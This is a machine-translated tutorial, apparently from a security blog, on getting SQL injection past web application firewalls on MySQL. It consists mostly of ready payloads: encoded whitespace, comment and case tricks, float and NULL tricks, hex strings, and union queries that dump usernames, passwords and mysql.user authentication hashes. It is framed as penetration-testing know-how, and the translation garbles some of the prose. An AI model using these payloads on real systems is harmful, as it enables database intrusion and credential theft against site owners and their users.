SQL  Injection bypass technology   It is already an old saying , Anti injection can use some clouds waf、 Accelerator and other safety products , These products come with  waf  Attribute interception and defense 
SQL  Inject ; There are also some products that install software in the server , for example  iis  Safe dog 、d  shield ; There is also the filtering and interception of input parameters in the program , for example 
360webscan  Scripts will be detected as long as parameters are passed in , If a harmful statement is detected, it will be intercepted .
SQL  There are also many techniques for injection bypass . But in the maturing  waf  In front of the product , because  waf  The rules of the product are becoming more and more perfect , So the defense will be higher and higher , Security system 
 Also improve , For penetration testing , The test becomes more and more difficult . Next, we will introduce in detail about  waf  Bypass method for intercepting injection .

One 、 Space character bypass

url The coding passes through the middleware  iis/apache  To a character , Then pass in the scripting language , Database driver  mysql_query(sql)

 Two spaces instead of one , use  Tab  Instead of spaces ,%a0 Instead of spaces .
%20 %09 %0a %0b %0c %0d %a0 %00 /**/ /*!*/
select * from users where id=1 /*!union*//*!select*/1,2,3,4;
%09 TAB  key （ level ）
%0a  Create a new line 
%0b TAB  key （ vertical ）
%0c  A new page 
%0d return  function 
%a0  Space 
 You can replace the space character with a comment  /**/ 
 You can also use  /*! The basis here  mysql  The content of the version is not commented */

Two 、 Case around

 Set the string to case , for example  and 1=1  Turn into  AND 1=1 AnD 1=1
select * from users where id=1 UNION SELECT 1,2,3,4;
select * from users where id=1 UniON SelECT 1,2,3,4;
 To filter spaces, you can use %0 Instead of , Also filter # --+ notes , Match with string 

99999999'%09UnIon%09SeLeCt%091,2,3%09and%09'1

99999999'%09UnIon%09SeLeCt%091,user(),3%09and%09'1

99999999'%09UnIon%09SeLeCt%091,(SeLEct%09group_concat(username,0x3a,password)from%09users),3%09and%09'1

3、 ... and 、 Floating point numbers bypass

select * from users where id=8E0union select 1,2,3,4;
select * from users where id=8.0union select 1,2,3,4;

Four 、NULL Value bypass

select \N;  representative  NULL
select * from users where id=\Nunion select 1,2,3,\N;
select * from users where id=\Nunion select 1,2,3,\Nfrom users;

\N' union select user(),2--+&submit=1

5、 ... and 、 Quote around

 If  waf  When intercepting and filtering single quotation marks , You can use double quotes , stay  mysql  You can also use double quotation marks as strings .
select * from users where id='1';
select * from users where id="1";

 You can also convert a string to  16  Base number , Query again .
select hex('admin');
select * from users where username='admin';
select * from users where username=0x61646D696E;

6、 ... and 、 Add library name

 The following two query statements , The results of the implementation are consistent , But some  waf  Interception rules don't [ Library name ].[ Table name ] This model .
select * from users where id=-1 union select 1,2,3,4 from users;
select * from users where id=-1 union select 1,2,3,4 from pikachu.users;

mysql  You can also add a database name query table in . For example, cross database query  mysql  In the database  usrs  Table contents .
select * from users where id=-1 union select 1,2,3,concat(user,0x3a,authentication_string) from mysql.user;

\N' union select 1,(select concat(user,0x3a,authentication_string) from mysql.user limit 1)--+&submit=1

7、 ... and 、 Go over and over again

 stay  mysql  Queries can use  distinct  Remove duplicate values from the query . You can use this to break through  waf  Intercept .
select * from users where id=-1 union distinct select 1,2,3,4 from users;
select * from users where id=-1 union distinct select 1,2,3,version() from users;